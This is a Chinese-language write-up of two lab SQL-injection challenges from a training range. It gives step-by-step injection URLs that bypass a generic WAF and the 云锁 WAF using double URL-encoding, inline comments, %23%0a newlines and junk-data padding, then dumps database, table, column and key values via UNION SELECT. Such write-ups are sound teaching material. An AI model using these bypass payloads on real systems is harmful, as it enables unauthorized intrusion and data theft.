SQL注入绕过WAF两道题目

前言

WAF工作原理

在实际的SQL注入绕过WAF两道题目
先随便输入一个双引号来显示报错闭合的语句

http://120.25.24.45:31832/?id=1" 
SQL注入绕过WAF两道题目
http://120.25.24.45:31832/?id=1")--+ 
SQL注入绕过WAF两道题目
http://120.25.24.45:31832/?id=1")/*asifnjanf*/%2561%256e%25641=2--+ 

这里解释一下%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的

它的报错SQL注入绕过WAF两道题目

http://120.25.24.45:31832/?id=1")/*asifnjanf*/OrDEr%23%0aby/*asifnjanf*/3--+ 

这里来确定它的字段数为3列
SQL注入绕过WAF两道题目

http://120.25.24.45:31832/?id=-1%22) union%23%0a all select/*safaqwf*/1,database(%23%0a),group_concat(schema_name) /*asdnuqw*/from information_schema.schemata--+ 

这里有一个细节,就是id=后面的加上一个负号,就是不显示前面的结果
爆出所有数据库,我们要选择目标数据库dotaxueyuan
SQL注入绕过WAF两道题目

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(table_name)%20/*asdnuqw*/from%20information_schema.tables where table_schema='dotaxueyuan'--+ 

爆出表名,目标表名是key
SQL注入绕过WAF两道题目

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(column_name)%20/*asdnuqw*/from%20information_schema.columns where table_name='key'--+ 

爆出列名key
SQL注入绕过WAF两道题目

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(`key`)%20/*asdnuqw*/from%20dotaxueyuan.key--+ 

爆出key值
SQL注入绕过WAF两道题目

SQL注入绕过云锁

SQL注入绕过WAF两道题目
先随便输入一个单引号来显示报错闭合的语句

http://120.25.24.45:30550/?id=1' 
SQL注入绕过WAF两道题目
http://120.25.24.45:30550/?id=1'--+ 
SQL注入绕过WAF两道题目
http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0a%2561%256e%25641=2--+ 

这里解释一下111111111111111111111这么一大串数字1就是运用SQL注入之垃圾数据绕过的原理,%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的
%23%0a这个URL解码就是#号和换行,也可以说是一个绕过姿势

它的报错信息是Unknown column '6e' in 'where clause' 意思是不存在6个列字段
SQL注入绕过WAF两道题目

http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0aOrder%23%0a/*qweqwd*/by/*dasasdsaddac*/3--+ 

判断字段数,这个题的字段数为3,它这题如果你输入正确的语句是不会回显的
SQL注入绕过WAF两道题目

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),3--+ 

爆出目标数据库dotaxueyuan
SQL注入绕过WAF两道题目

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(table_name) from information_schema.tables where table_schema=%27dotaxueyuan%27--+ 

爆出表名,目标表名是key
SQL注入绕过WAF两道题目

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(column_name) from information_schema.columns where table_name=%27key%27--+ 

爆出列名key
SQL注入绕过WAF两道题目

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(`key`) from dotaxueyuan.key--+ 

爆出key值
SQL注入绕过WAF两道题目
靶场链接来自于东塔攻防世界靶场
https://labs.do-ta.com/index/course/index?one=15&two=17&three=51&level=-1&other=-1&title=

版权声明:玥玥 发表于 2021-04-09 18:26:34。
转载请注明:SQL注入绕过WAF两道题目 | 女黑客导航